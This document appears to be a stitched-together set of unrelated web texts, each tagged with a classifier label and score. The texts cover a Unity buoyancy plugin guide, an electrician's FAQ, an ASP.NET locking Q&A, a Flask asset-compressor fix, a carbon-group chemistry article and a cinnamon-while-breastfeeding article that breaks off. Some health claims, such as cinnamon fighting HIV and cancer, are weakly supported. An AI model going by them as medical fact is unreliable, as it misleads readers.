by attaching a Collider with isTrigger = true to the WaterDataProvider. As long as the object is inside the trigger it will use data from that WaterDataProvider. Minimal Setup 1. Add a Cube (or any other mesh) to the scene. 2. Attach WaterObject to the Cube. Make sure that a Rigidbody has been added. 3. Press Play. The object will now float at default water height (set under WaterObject settings). Adding Water To add water to the scene check the Water Assets page. FlatWaterDataProvider can be used to make water height follow a flat primitive plane which results in something like this: A basic primitive plane used as water. Water Particle System WaterParticleSystem can be used to generate foam. It works with any flat water. 1. Drag DefaultWaterParticleSystem from DWP2 ⇒ Resources into the scene and parent it to the Sphere. Example WaterParticleSystem setup. 2. Move the Sphere to be above the water and press play. Sphere falling into the water will generate foam around it based on simulation data. WaterParticleSystem and ParticleSystem values can be tweaked to suit the needs of the project. Center Of Mass CenterOfMass is a simple script that offsets the center of mass of a Rigidbody. Unity calculates center of mass of the object from all of its colliders, as if the object were homogenous. In many cases this is not correct - a ship has ballast, a crate could have some load in it, a barrel could have oil, etc. To adjust the center of mass of an object simply attach CenterOfMass script to the same object that contains the Rigidbody and adjust the Center Of Mass Offset - a value in local coordinates which tells how much to offset center of mass from the Unity-calculated point. Want a ship to be less prone to capsizing? Lower the Y component of COM. CenterOfMass inspector. Water Object Wizard WaterObjectWizard is a helper script that sets up a WaterObject automatically. It is still recommended to have knowledge of manual setup and how things work, but this script can automate and speed up the setup process. A primitive Sphere will be used, same as in the rest of the guide above. 1. Add a 3D Object > Sphere to the scene. 2. Add WaterObjectWizard to the newly create Sphere. 3. Tick Add Water Particle System (optional). This option is self-explanatory. 4. Click Auto-Setup and press Play after the setup is done. The Sphere now floats and generates foam. Next step would be to manually check and tweak the default values, such as Target Triangle Count, center of mass, etc.
__label__pos
0.820317
 FAQ Faraday Electrics Ltd 0115 9894024 07811 286635  [email protected] Do I have to wait all day for your electrician? No, we provide 2 hour time slots for our electrician to arrive. The vast majority of call-out work can be completed in less than an hour. Do you provide free quotations? For larger projects such as lighting design, house rewires etc. we will provide you with a free quotation. Obviously, it is not cost effective for us to send someone to quote for a repair. In that instance we charge per hour, with a 1 hour minimum charge. Are your electricians qualified? Yes, all our electricians are NAPIT or NICEIC qualified. Is Faraday Electrics Ltd insured? Yes, we carry £5 Million worth of insurance. Is your work guaranteed? All our work carries a one year no quibble warranty on defective parts. The NICEIC insurance backed warranty covers work undertaken by contractors registered to the NICEIC Installer Scheme. Will you have the electrical part for my repair? Our electricians carry a lot of electrical parts – fuses, spare lights, switches, wire, cables etc. We certainly hope to carry a wide range of parts to enable us to fix and replace faulty parts and get your electrical system working as quickly as possible. However, with the diversity of electrical systems and RCD units, it is just not possible to carry every part that you might come across. What’s involved in rewiring a house? A rewire is the most disruptive and invasive work that a property can undergo. Every room will need to have the following carried out: In addition, to rewire the lighting upstairs, this requires the loft to be cleared to gain access to the lighting points and to each switch drop. We are experienced at making the rewire as hassle and mess free as is possible. What is an RCD (Residual Current Device)? RCD stands for Residual Current Device. They used to be called ELCB’s (Earth Leakage Circuit Breakers). They are usually fitted as standard to most domestic consumer units in houses built after around 1980. They tend to only protect certain parts of the distribution panel wiring (e.g. the kitchen or utility ring main), in a so-called “split-load” consumer unit. They are designed to quickly trip and interrupt the supply to the circuit they are protecting when an imbalance is detected between the neutral and live (in the case of an RCD) or when there is a current in the earth wire of the protected circuit, above a pre-set limit (usually 30mA), in the true ELCB. You can also purchase “plug-in” RCDs, ideal for mowers, vacuums, and hairdryers, and an RCD plug, for things like shower pumps. Although the primary protection is the fuse in the plug, these do not blow for some fault conditions and they are there mainly to protect the wiring and the appliance from overloads. The RCD is ideal to protect the user from electric shocks and earth leakage faults. My RCD on the consumer unit trips out, what do I do? If this is a solid fault (i.e. it won’t reset), it is most likely due to a faulty appliance that is plugged in but which has developed a fault. The most likely culprit is the washing machine, dishwasher or tumble dryer. Try unplugging each one in turn until the RCD remains latched in the “ON” state. If it is not one of those items and your freezer is also on the same circuit then try unplugging that too. If the problem remains use an extension lead and plug it into a plug in another room as a temporary measure (on a circuit not affected) until you locate the faulty appliance. Other likely culprits are the kettle, a steam iron, (usually anything that comes into contact with water!). However, don’t forget that even small things like radio alarm clocks, phone chargers and mains adaptors can cause the RCD to trip out so check all your items. If you still cannot find the problem, call in a professional electrician. Why do I need a Landlord’s Electrical Safety Certificate? As a Landlord, it is important to ensure that all electrical appliances and fittings within the property you rent out are safe. However, unlike gas regulations, there is no legislation that demands you must have a landlord electrical safety certificate. That said, should any electrical fittings or appliances with your rental property cause actual harm to the tenant, you could be held liable. In the worst case scenario, your tenant could sue you for damages or you might be brought before a court for negligence under the Electrical Equipment (Safety) Regulations 1994. Why would I want a Visual Electrical Inspection? If you are purchasing a new flat or house, you may find a Visual Electrical Inspection helpful. This report can give you a reasonable indication of the state of the electrical system in the property. This may help you make an informed decision on whether to purchase the property or whether to negotiate for a discount! It can save the expense of a full electrical safety certificate and inspection, which is a far more expensive and time consuming process. What is a Periodic inspection? A Periodic Inspection Report (PIR) is an electrical test on the condition of the electrical wiring, installations and electrical connections such as accessories, light switches and electric sockets within a property. The electrical installation – such as the wiring in a house – is tested against current electrical safety standards. The report lists any faults, possible concerns, and potential problems that need further investigation. The PIR report also provides a timescale of urgency on which action should be taken. The electrical test itself does not attempt to repair any of problems that may be highlighted. The report can be used to decide whether to budget for any remedial works or additional investigation. What is Part ‘P’ of the building regulations? Since 2005, if you’re doing work to your home that involves electricity, it needs to be covered by ‘Part P’ of the Building Regulations. That’s the law. It means whoever is carrying out the work needs to follow rules that make sure the work protects you and your family from fire or electric shock. It’s designed to keep you and your family as safe as possible. This applies if you’re putting electricity into a new house or extension, or if you’re having an existing system adapted or rewired. You can find full details on Part P on the Communities and Local Government website, www.communities.gov.uk. Faraday Electrics Ltd is a registered Part P installer. The advantages of this are: What does Part P of the Building Regulations mean to me? If you use Faraday Electrics Ltd, you can expect to have safe electrical work done, as the work will meet the UK national standard, BS 7671 (Requirements for Electrical Installations). When the work is finished you will receive: What should I do if I’m unsure about electrical safety? You should contact a fully qualified electrician, such as Faraday Electrics Ltd who will be happy to reassure you and visit your premises if needs be. All the views and opinions expressed on this page are given for guidance only and are our interpretation of hypothetical circumstances; we cannot accept any liability for any actions taken as a result of this guidance. We strongly recommend that all electrical work is designed, installed maintained and tested by a suitably qualified electrician. As always with electrical installation work you should consult a suitably qualified person.                    0115 9894024         07811 286635           [email protected]
__label__pos
0.938143
Dismiss Announcing Stack Overflow Documentation We started with Q&A. Technical documentation is next, and we need your help. Whether you're a beginner or an experienced developer, you can contribute. Sign up and start helping → Learn more about Documentation → My application stores two related bits of data in application state. Each time I read these two values, I may (depending on their values) need to update both of them. So to prevent updating them while another thread is in the middle of reading them, I'm locking application state. But the documentation for HttpApplicationState.Lock Method really doesn't tell me exactly what it does. For example: 1. How does it lock? Does it block any other thread from writing the data? 2. Does it also block read access? If not, then this exercise is pointless because the two values could be updated after another thread has read the first value but before it has read the second. In addition to preventing multiple threads from writing the data at the same time, it is helpful to also prevent a thread from reading while another thread is writing; otherwise, the first thread could think it needs to refresh the data when it's not necessary. I want to limit the number of times I perform the refresh. share|improve this question up vote 1 down vote accepted Looking at the code is locking only the write, not the read. public void Lock() { this._lock.AcquireWrite(); } public void UnLock() { this._lock.ReleaseWrite(); } public object this[string name] { get { return this.Get(name); } set { // here is the effect on the lock this.Set(name, value); } } public void Set(string name, object value) { this._lock.AcquireWrite(); try { base.BaseSet(name, value); } finally { this._lock.ReleaseWrite(); } } public object Get(string name) { object obj2 = null; this._lock.AcquireRead(); try { obj2 = base.BaseGet(name); } finally { this._lock.ReleaseRead(); } return obj2; } The write and the read is thread safe, meaning have all ready the lock mechanism. So if you going on a loop that you read data, you can lock it outside to prevent other break the list. Its also good to read this answer: Using static variables instead of Application state in ASP.NET Its better to avoid use the Application to store data, and direct use a static member with your lock mechanism, because first of all MS suggest it, and second because the read/write to application static data is call the locking on every access of the data. share|improve this answer      If so, there doesn't appear to be any way to keep my two data synchronized when being read except to store the two items in the same object. – Jonathan Wood Oct 26 '12 at 23:09      @JonathanWood I say that you can lock when you going to read data, to avoid others to write on them and change them. All the rest are synchronized all ready, and they are thread safe – Aristos Oct 26 '12 at 23:10      Can you tell me how the locks works? Does _lock.AcquireWrite() block any other threads trying to write? – Jonathan Wood Oct 26 '12 at 23:16      @JonathanWood Yes, that's is what is do. (its an inside signaling code, not a standard function) – Aristos Oct 26 '12 at 23:17      @JonathanWood Take a look also to this answer: stackoverflow.com/a/10964038/159270 – Aristos Oct 26 '12 at 23:29 Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.970975
Feedback Mechanisms Regulate The Rate Of Enzyme Activity nuclear receptors rock around the clock | embo reports Prices 2019 - Feedback Mechanisms Regulate The Rate Of Enzyme Activity, Pearson - the biology place - phschool.com, Glossary of biological terms ← back. p pacemaker. a specialized region of the right atrium of the mammalian heart that sets the rate of contraction; also called the sinoatrial (sa) node.. Bile acid synthesis, metabolism and biological functions, Bile acid synthesis and utilization. the end products of cholesterol utilization are the bile acids. indeed, the synthesis of the bile acids is the major pathway of cholesterol catabolism in mammals.. Tubuloglomerular feedback - an overview | sciencedirect topics, Tubuloglomerular feedback. tubuloglomerular feedback is an adaptive mechanism that links the rate of glomerular filtration to the concentration of salt in the tubule fluid at the macula densa..
__label__pos
0.75195
ssctui.dll Application using this process: Siebel Enterprise Applications Recommended: Check your system for invalid registry entries. ssctui.dll Application using this process: Siebel Enterprise Applications Recommended: Check your system for invalid registry entries. ssctui.dll Application using this process: Siebel Enterprise Applications Recommended: Check your system for invalid registry entries. What is ssctui.dll doing on my computer? ssctui.dll is a module belonging to Siebel Enterprise Applications from Siebel Systems, Inc. Non-system processes like ssctui.dll originate from software you installed on your system. Since most applications store data in your system's registry, it is likely that over time your registry suffers fragmentation and accumulates invalid entries which can affect your PC's performance. It is recommended that you check your registry to identify slowdown issues. ssctui.dll In order to ensure your files and data are not lost, be sure to back up your files online. Using a cloud backup service will allow you to safely secure all your digital files. This will also enable you to access any of your files, at any time, on any device. Is ssctui.dll harmful? ssctui.dll has not been assigned a security rating yet. ssctui.dll is unrated Can I stop or remove ssctui.dll? Most non-system processes that are running can be stopped because they are not involved in running your operating system. Scan your system now to identify unused processes that are using up valuable resources. ssctui.dll is used by 'Siebel Enterprise Applications'.This is an application created by 'Siebel Systems, Inc.'. To stop ssctui.dll permanently uninstall 'Siebel Enterprise Applications' from your system. Uninstalling applications can leave invalid registry entries, accumulating over time. Is ssctui.dll CPU intensive? This process is not considered CPU intensive. However, running too many processes on your system may affect your PC’s performance. To reduce system overload, you can use the Microsoft System Configuration Utility to manually find and disable processes that launch upon start-up. Why is ssctui.dll giving me errors? Process related issues are usually related to problems encountered by the application that runs it. A safe way to stop these errors is to uninstall the application and run a system scan to automatically identify any PC issues. Process Library is the unique and indispensable process listing database since 2004 Now counting 140,000 processes and 55,000 DLLs. Join and subscribe now! Toolbox ProcessQuicklink
__label__pos
0.923834
nisd.domain.name This configuration parameter specifies the NIS domain name for the adnisd process to use when communicating with NIS clients. For example, to specify that you want to use euro-all as the NIS domain name in the zone named Europe-00-Zone, you can set this parameter as follows: nisd.domain.name: euro-all If this parameter is not defined in the configuration file, the zone name is used by default.
__label__pos
0.724774
Courses Courses for Kids Free study material Free LIVE classes More Carbon Group Elements Group 14 Elements Last updated date: 20th Mar 2023 Total views: 213.6k Views today: 1.91k A carbon group element consists of six chemical elements that make up group 14 elements of the periodic table, Carbon family elements contain carbon (C), silicon (Si), germanium (Ge), tin (Sn), lead (Pb), and flerovium (Fl). The properties of the carbon group periodic table and other compounds in that family are intermediate between the properties related to the elements of the adjacent boron and nitrogen group elements. The electronic configurations (ground state) of carbon group elements show that each of them has four electrons in its outermost shells. If n represents the outermost shell (where n is 2 for carbon, 3 for silicon, and so on), then these four electrons are represented by the symbols ns2np2. Elements belonging to Group 14  have oxidation states of +4 and +2 for the heavier elements due to the inert pair effect. This page deals with details of the periodic properties of carbon family elements, Let’s discuss carbon group numbers and briefly discuss the individual properties of carbon, silicon, germanium, tin, lead, and flerovium. Carbon Group Periodic Table All the carbon family elements are familiar in daily life either in the pure elemental form or in the form of compounds, except germanium and the artificially produced flerovium, they are not present naturally, also except for silicon, none is abundant in the Earth’s crust. Carbon can form a different variety of compounds both in the plant and animal kingdoms. Silicon and its minerals form a fundamental component of the Earth’s crust; silica (silicon dioxide) is also called sand.  Germanium can form some minerals and is mostly found in small concentrations with the mineral zinc blende and in coals. Even though germanium is considered one of the rarer elements, its importance is in its properties like semiconductors. Some carbon-containing molecules are carbon dioxide (CO2) and methane (CH4).  Carbon Carbon is the 4th most abundant common element present on earth’s crust and occurs naturally as anthracite (a type of coal), graphite, and diamond.  Symbol: C Atomic Number: 6 Atomic Mass: 12.0107 u It is mostly used in organic chemistry, as it is the distinguishing feature of an organic compound.  And is also unique among the elements because of its ability to form strongly bonded chains, with hydrogen atoms. It is considered to be the "backbone" of biology, as all life forms on earth are carbon-based. This is due to its qualities of small size and its unique electron configuration. Since carbon atoms are small in size, their p-orbital electrons overlap considerably and enable π bonds to form. Common molecules that are carbon-based are carbon dioxide (CO2) and methane (CH4). Impure carbon which is in the form of charcoal obtained from wood and coke obtained from coal is used in metal smelting. It is commonly used in the iron and steel industries. Graphite is used in pencils and used to make brushes in electric motors and in furnace linings. Activated charcoal is used for purification and filtration and can be found in respirators also. Carbon fibre also finds its application as a very strong, lightweight, material. It is currently used in tennis rackets, skis, fishing rods, rockets, and airplanes. Silicon Symbol: Si Atomic Number: 14 Atomic Mass: 28.0855 u Silicon is the 2nd most common element which is found in the earth's crust (after oxygen) and is considered the backbone of the mineral world. It is classified as neither metal nor nonmetal but is a metalloid. Silicon is inert, primarily reacting with halogens. Silicon plays a much smaller role in biology,  It may have functioned as a catalyst in the formation of the earliest organic molecules Plants highly depend on silicates in order to hold nutrients in the soil, where their roots can absorb them. Silicon (primarily found in silica, SiO2, molecule) has been used for millennia in the creation of ceramics and glass. if carbon can be considered as the backbone of human intelligence, silicon can be considered as the backbone of artificial intelligence. Silicon can be found in sandy beaches and is also a major component of concrete and brick. • Being a semiconductor, it is used to make transistors. • It is most commonly used in computer chips and solar cells. • It can be used while production of fire bricks. • Most waterproofing systems use silicones as a component. • Silicon can be used in many moulds and moulding compounds. • It is also one of the components of ferrosilicon which is an alloy commonly used in the steel industry. Germanium  Symbol: Ge Atomic Number: 32 Atomic Mass: 72.64 u It is a rare element that is used in the manufacturing of semiconductor devices. The physical and chemical properties of germanium are somewhat similar to those of silicon. It is gray-white in colour and it forms a crystal structure. Germanium acts as a semiconductor that is doped with arsenic and other elements and can be used as a transistor in electronic applications. The oxides of Germanium have a high index of dispersion and refraction that makes it good to use in wide-angle camera lenses & objective lenses for microscopes. It can be used as an alloying agent in contact with fluorescent lamps and as a catalyst. They are used in infrared spectroscopes because both germanium and germanium oxides are transparent to infrared radiation. Stannum Symbol: Sn Atomic Number: 50 Atomic Mass: 118.71 u Tin is a soft, malleable metal that has a low melting point. It has two solid-state allotropes at regular temperatures and pressures and is denoted by α and β. At higher temperatures (above 13°C), tin exists as white tin and is often used in the formation of alloys. At lower temperatures, it can be transformed into gray tin, it loses its metallic properties and turns powdery.  Tin shows a chemical similarity with both of its neighbours in group 14 i.e germanium and lead and has two main oxidation states, +2 and the slightly more stable in +4 state. • Gray tin can be used to plate iron food cans in order to prevent them from rusting. Tin is malleable, ductile, and crystalline. It has 27 isotopes of which 9 are stable and 18 are unstable. It is a superconductor at low temperatures.  • It can be used in the process of tin plating, coating and polishing as it has a high resistance to corrosion • It is used in the soldering of steel as it possesses high magnetic strengths and lower melting points • It can be used in the manufacture of other alloys like bronze and copper • It is used as a reducing agent and as a dyeing agent for glass, ceramics, and sensors. • It is used as an anti-fouling agent for boats and ships In the shipping industry. • It is employed in some products in the form of stannous chloride (SnCl2)in dental applications. • It finds its applications in the electrodes of batteries like Li-ion batteries. • It can be widely used in the manufacture of food containers that are made of steel. This element in organic form is most dangerous to human health. It can cause severe effects in humans such as Eye and skin irritations, Headaches, Sickness, dizziness, Breathlessness, Severe sweating along with many other problems. Plumbum Symbol: Pb Atomic Number: 82 Atomic Mass: 207 u Lead a very soft, silvery-white, or grayish metal is very similar to tin in that it is a soft, malleable metal with a low melting point. It was widely used in water and sewage pipes, Lead is toxic to human health, especially to children. Even very low-level exposure can cause nervous system damage and can prevent proper production of haemoglobin (the molecule in red blood cells responsible for carrying oxygen through the body), Lead is stable in an oxidation state of +2 or +4. Its oxides can have multiple industrial uses like oxidizing agents, such as cathodes in lead-acid storage cells. It is used in heavy and industrial machinery, sheets, and other parts made from lead compounds which can be used to dampen noise and vibration. Flerovium  Symbol: Fl Atomic Number: 114 Atomic Mass: 289 u Flerovium (Fl) was discovered in 1998 by scientists in Dubna. It is radioactive and very short-lived, The long-lasting isotope of flerovium has an atomic weight of 289 and a half-life of 0.97 seconds. Three other isotopes of flerovium have half-lives of 0.52, 0.51, and 0.16 seconds respectively. Conclusion Here, we have studied carbon family elements and some of their uses and properties, Different elements of this group are carbon (C), silicon (Si), germanium (Ge), tin (Sn), lead (Pb), and flerovium (Fl). Carbon is commonly used almost everywhere whereas Flerovium is radioactive in nature. FAQs on Carbon Group Elements Q1. Carbon Belongs to Which Group? Why Carbon Can Form a Very Large Number of Compounds? Answer: Carbon belongs to group 14 element. It is the only element that can form a bond with many different compounds because each carbon atom can form four chemical bonds to other atoms and the carbon atom having a small size is just the right fit in as parts of very large molecules. This property is called catenation.  Q2. Explain the Properties of Carbon: Answer: The three properties of carbon are: (a) Catenation: Carbon has a unique tendency to form bonds with other atoms of carbon, giving rise to large molecules. This property is termed catenation. (b) Tetravalency: Carbon has a valency of four, so it is capable of bonding with four other atoms of carbon or atoms of some other monovalent element. (c) Isomerism: The compounds with identical molecular formulas but different structural formulas are called isomers and the property is known as isomerism. Q3. Write Some Physical Properties of Diamond? Answer: Some physical properties of diamond are: 1. It is extremely hard has a very high melting point. 2. It has a high relative density and is transparent to X-rays. 3. It has a high refractive index and is a bad conductor of electricity. 4. It is a good conductor of heat and is insoluble in all solvents.
__label__pos
0.989412
Skip to content Do You Suffer from Sleep Debt? woman with insomniaWith stress and uncertainty running rampant these days, we understand better than most that it’s affecting everyone’s quality of life in some way. For a lot of people, this can mean not getting enough good sleep. But did you know that if you get a few poor nights of sleep in a row, it takes more than just one good night of sleep to make up for it? That’s where ‘sleep debt’ comes in. Think of your sleep hours as a bank. If you need 8 hours of sleep each night to feel good and rested, but have a few nights each week where you’re only getting 5 hours of sleep, you’re in a ‘sleep debt’ of several hours. So, what can you do to improve your sleep debt? Give these tips a try for a better night’s rest. • Avoid taking naps during the day. Naps don’t offer our bodies the best time for rejuvenation like we get with actual sleep. While they feel nice, if you have trouble sleeping at night, you’ll want to skip them during the day to set yourself up for success. • Don’t eat after dinner. Some studies indicate that eating meals or simply snacking too close to bed time can cause us to toss and turn and wake up more than usual. Instead of snacking before bed, redirect your urge to a different activity, like walking or reading. • Keep a sleep schedule. This means going to bed at the same time each night and awakening at the same time each morning. This will help your body get into a routine, and eventually, sleep easier and more soundly. • Add more exercise into your day. People who work out regularly often sleep better! It doesn’t mean that you need to suddenly begin an intense routine-if you’re not too active currently, start by adding a brisk 30-minute walk to your day and build momentum from there. Add Your Comment (Get a Gravatar) Your Name * Your email address will not be published. Required fields are marked *.
__label__pos
0.90353
How to use JAC (jinja-assets-compressor) in Flask and with Flask-User If you use flask-user in your flask application , and jac won’t work, also flask_static_crompress package (which do not have even one line ,only jac flask contrb file reference, its funny). Problem HOW to make it work. In your Init_app function, if you do not have it please try to use this method create app once ,its very smart way .code like below:   app=Flask(__name__) jac = JAC() def init_app(): jac.init_app(app) app.jinja_env.compressor_debug = app.config.get('DEBUG') app.jinja_env.compressor_output_dir = './static' app.jinja_env.compressor_static_prefix = '/static' If you do not use Flask-User, its done otherwise you have to custom your static_finder function (file jac/contrib/flask.py ) and add one line to above config: app.jinja_env.compressor_source_dirs = static_finder(app)    def static_finder(app): def find(path=None): if path is None: folders = set() for blueprint in app.blueprints.values(): if blueprint.static_folder is not None: folders.update([blueprint.static_folder]) folders.update([app.static_folder]) return folders else: bp_values = app.blueprints.values() # dectect flask-user if 'flask_user' in [x.name for x in bp_values]: app.blueprints['flask_user'].name = 'user' for rule in app.url_map.iter_rules(): if '.' in rule.endpoint: with_blueprint = True blueprint_name = rule.endpoint.rsplit('.', 1)[0] for x in bp_values: if x.name == blueprint_name: blueprint = x data = rule.match(u('{subdomain}|{path}').format( subdomain=blueprint.subdomain or '', path=path, )) else: with_blueprint = False data = rule.match(u('|{0}').format(path)) if data: static_folder = blueprint.static_folder if with_blueprint and blueprint.static_folder is not None else app.static_folder return os.path.join(static_folder, data['filename']) raise IOError(2, u('File not found {0}.').format(path)) return find   发表评论 您的电子邮箱地址不会被公开。
__label__pos
0.998206
1 I have defined a content type in content type hub. I would like to use this content type on a site (other than the hub) but also to extend it with an additional (lookup) column. Is it possible to do so and to preserve the synchronization of the content type with the content type hub? The reason why I need this in the first place is because I cannot create a lookup column within the content type hub and make it work in another site collection. I've read somewhere that if you create a list (the one the lookup is targeting) inside the content type hub site, make a template from it and then recreate that same list on another site, that the lookup would work. But it doesn't - I expected this, because the GUIDs don't match. So is there a way to solve this? 1 Irrelevant of the Content Type hub, working with look-up columns can be tricky. You either create them declaratively (at the time of Content Type deployment) - which also assumes the list you are targeting is already there (or self-referencing -the same way the Tasks or Issues list work) or use code, say during a FeatureActivated handler where you could create the lookup programatically and attach it to the list - could be targetting content type at the SPWeb level. So, a potential solution for you would be (assuming you already have properly publish Content Types from the CT-Hub) to either manually add the lookup on the list, or still manually create a new Content Type at the Web Level, which inherits from the one coming from SPSite level, and published by the CT-Hub and add the lookup at the SPWeb level, as this way you could target the proper list. Or programatically, create a new SPContentType by using the construction enabling you to pass in the SPContentTypeId of the Parent and add it directly into the SPWeb.ContentTypes collection. Once SPWeb Updated you could create a new Lookup column and link it to your new Content Type. 1 • @Marius, thanks for replying. I have thought of going for the approach in which I manually create an inheriting content type at the web level and extending it with the lookup column. This, however, brakes the synchronization with the CT hub, i.e. if I edit the content type in the hub after the web level content type is created, it (the inheriting content type) does not get updated. It looks like the inheritance breaks the dependency with content type in the content type hub. – Boris Jul 13 '12 at 11:44 Your Answer By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.73533
Spend Just 12 Minutes Each Day. Here’s Easy Exercises To Give You Hot Legs Spend Just 12 Minutes Each Day   Looking to burn thigh fat? You are in luck. The video, featured below, shows how you can burn thigh fat with just 12 minutes a day. According to Mayo Clinic, one of the most effective ways to burn extra calories is to integrate a combination of the following three elements into one’s life: 1. Lifestyle changes: For example, Mayo Clinic recommends a diet low in diary and saturated fats. They recommend making small changes in daily life. For instance, try taking the stairs instead of using the elevator. The small changes add up. 2. Strength training: Muscle burns more calories, even while you are resting. The video below shows you how to do exercise from side lunges to leg lifts. Both are intended to define and tone those leg muscles. 3. Consistent aerobic exercise: “As a general goal, include at least 30 minutes of physical activity in your daily routine,” states Mayo Clinic. You can’t get to 30 without starting with just committing 12 minutes. What better way than to make it easy?! YouTube channel XHIT Daily shows how it’s down below. The video below shows you how to lose thigh fat with just 12 minutes a day!     Source:   www.healthtipsportal.com Comments comments
__label__pos
0.507877
URL of this page: //www.nlm.nih.gov/medlineplus/ency/imagepages/8976.htm Infant jaundice Infant jaundice Overview Jaundice is a yellow discoloring of the skin, mucous membranes, and eyes, caused by too much bilirubin (a breakdown product of hemoglobin made by the liver) in the blood. Jaundice is a condition produced when excess amounts of bilirubin circulating in the blood stream dissolve in the subcutaneous fat (the layer of fat just beneath the skin), causing a yellowish appearance of the skin and the whites of the eyes. Update Date 12/12/2014
__label__pos
0.710996
Why-Avoid-Cinnamon-while-Breastfeeding Breastfeeding,  Motherhood Why Avoid Cinnamon while Breastfeeding Is it safe to take cinnamon while breastfeeding Cinnamon is used around the world for its delicious taste and amazing health benefits. However, cinnamon while breastfeeding may pose certain risks to your newborn baby. In this article, you’ll learn about cinnamon, its health benefits, and the risks it poses to your breastfeeding newborn. What is Cinnamon? What is Cinnamon? What is Cinnamon? Cinnamon comes from the inner bark of certain tree species from the genus Cinnamomum. The dried bark strips, ground powder, and derived essential oil are all used to add flavor to food. Because only a few Cinnamomum species are grown for their spice, many differentiate between the cinnamon varieties harvested. Cinnamomum Verum, also called “true cinnamon” or “Ceylon,” is rarely grown commercially. Most cinnamon purchased in stores comes from the related tree species, Cinnamomum cassia. This cinnamon, labeled as “cassia,” accounts for more of the world’s cinnamon supply. Cinnamon is used to add flavor to pastries, breakfast foods, cereal, fruit, chicken, coffee, and more. Recipes, especially for sweets, often use cinnamon because of its sweet and pleasant flavor. But before we get to the question is it safe to eat cinnamon while breastfeeding, let’s talk about cinnamon’s health benefits.  Cinnamon Health Benefits Cinnamon provides many health benefits when eaten or taken as a supplement. Below are 12 key health benefits of cinnamon. It can increase metabolism. Cinnamon is high in the compound cinnamaldehyde. This compound improves metabolism and can help individuals lose weight. It is common for people to add it to their coffee or apple cider vinegar to reap the benefits to their metabolism. Cinnamon has lots of antioxidants. Antioxidants provide many benefits for your body by scavenging free radicals and reducing the damage done by oxidation. They can also prevent you from developing many diseases, such as heart disease and some cancers. One study compared the antioxidant levels in over twenty spices and found that cinnamon was the clear winner. It even managed to outrank the antioxidant levels in superfoods like garlic and oregano. Cinnamon has anti-inflammatory uses. Your body uses inflammation to fight infections, repair damage, and stay healthy. However, if your body’s inflammation response is fighting against its own tissue, it becomes a problem. Your body’s inflammation response increases symptoms in illnesses like asthma, arthritis, Crohn’s disease, active hepatitis and more. For those suffering from increased inflammation responses, cinnamon can be used for its anti-inflammatory properties. It can be used for medicine because of its anti-viral, anti-bacterial, and anti-fungal properties. Herbal medicine often uses cinnamon because of its healing potential. Studies have shown that cinnamon consumption can help individuals fighting infections. Over the years, cinnamon has been used to treat bad breath (caused by bacteria in the mouth), toothaches, digestion problems, and more. Some studies even suggest that cinnamon consumption can help individuals fighting certain cancers, such as colon cancer. It may improve gut health. Gut health is important for fighting infection and improving overall wellbeing. Cinnamon has prebiotic properties that help your gut grow healthy bacteria, suppressing the growth of pathogenic (bad) bacteria. When consumed regularly, cinnamon can help with gut health and lend to healthier digestion. Cinnamon is a good source of manganese and contains small amounts of calcium and fiber. Manganese is an important nutrient for fostering overall health. It helps your body form connective tissues, bones, blood clotting, and sex hormones. Consuming manganese can also help with metabolism, calcium absorption, and regulating blood sugar. Because cinnamon is a good source of manganese, people can reap these benefits by consuming it. Cinnamon also has small amounts of calcium and fiber. Both calcium and fiber lend to overall physical health. It may reduce your chances of developing heart disease. The number one cause of premature death around the world is heart disease. Some studies suggest that regular cinnamon consumption may reduce the risk of developing heart disease. One study found that half a teaspoon of cinnamon each day showed a positive effect on blood markers for patients with type 2 diabetes. Because cinnamon reduces the amount of LDL (bad) cholesterol, your overall risk for heart disease is reduced. Cinnamon can also reduce blood pressure. Together, these effects can lessen your risk of premature death due to heart disease. Cinnamon reduces blood pressure. Consuming cinnamon can result in a reduction of your blood pressure. Early studies indicate that consuming it with some regularity can help manage chronic high blood pressure. However, more studies need to be done before it can be safely used to manage high blood pressure. In the meantime, it can be used to supplement traditional medicine for lowering blood pressure. Cinnamon while Breastfeeding Cinnamon while Breastfeeding Cinnamon has anti-diabetic effects. Cinnamon can lower blood sugar and increase insulin sensitivity. For individuals suffering from diabetes, cinnamon consumption can help them manage their illness without the need for more insulin injections. Although it has powerful anti-diabetic effects, diabetics should always use care to monitor their blood sugar levels. Despite the fact it can decrease the need for insulin, cinnamon should never be used to replace emergency diabetic medication. It can relieve digestive discomfort. Cinnamon can be used to relieve digestive discomfort in adults. It has been used in many cultures to treat gas and digestive imbalances. To aid in digestion, many people brew cinnamon into a warm drink like tea. Drinking warm cinnamon tea can help reduce or alleviate digestion problems. Some studies show it may reduce the risk of some cancers. As mentioned above, studies are showing that cinnamon is useful in the prevention and treatment of some cancers. It works by reducing the growth of cancer cells in humans body. Because it increases certain enzymes in the colon, it is helpful in reducing growth of cancer cells in the colon. There’s some evidence that it can help fight the HIV virus. Cassia cinnamon may help fight against HIV-1, the most common strain of the HIV virus. One study compared cinnamon to over sixty other plants and found that cinnamon was the most effective in fighting HIV-infected cells. However, more studies and trials will be needed to determine whether or not cinnamon is a viable solution to HIV. Cinnamon and Breastfeeding Although cinnamon has many health benefits, using cinnamon while breastfeeding as a medicine poses certain risks. Coumarin, a component in cinnamon that lends to its flavor, can be harmful in larger quantities. Because coumarin levels are lower in Ceylon cinnamon than in cassia, Ceylon cinnamon is safer to consume. Cinnamon is often used for its ability to increase metabolism. However, if this effect is passed on to a breastfeeding baby through breastmilk, it can cause problems. An increased metabolism and lowered blood sugar levels can be dangerous to your baby. Consuming too much cinnamon while breastfeeding can cause these problems. It is important to note that cinnamon is not regulated by the FDA. This is why all the effects and risks of using cinnamon while breastfeeding remain unknown. Additionally, consuming large amounts of cinnamon while breastfeeding can create breastmilk with a cinnamon flavor. This may cause your baby to stop drinking your milk because they don’t like the change in flavor. It may also cause indigestion in your baby, since their bodies are still developing and may not be ready to digest cinnamon. In extreme cases, your baby may develop an allergic reaction to cinnamon. Because these possible risks to your baby haven’t yet been sufficiently studied, it’s important to consult a doctor before taking or consuming cinnamon while breastfeeding. Your doctor will be best equipped to help you navigate any dietary changes during your pregnancy and breastfeeding. Is it safe to take cinnamon while breastfeeding? Is it safe to take cinnamon while breastfeeding Is it safe to take cinnamon while breastfeeding? Cinnamon supplements are popular for a variety of reasons. By taking supplements using cinnamon essential oil or concentrated amounts of 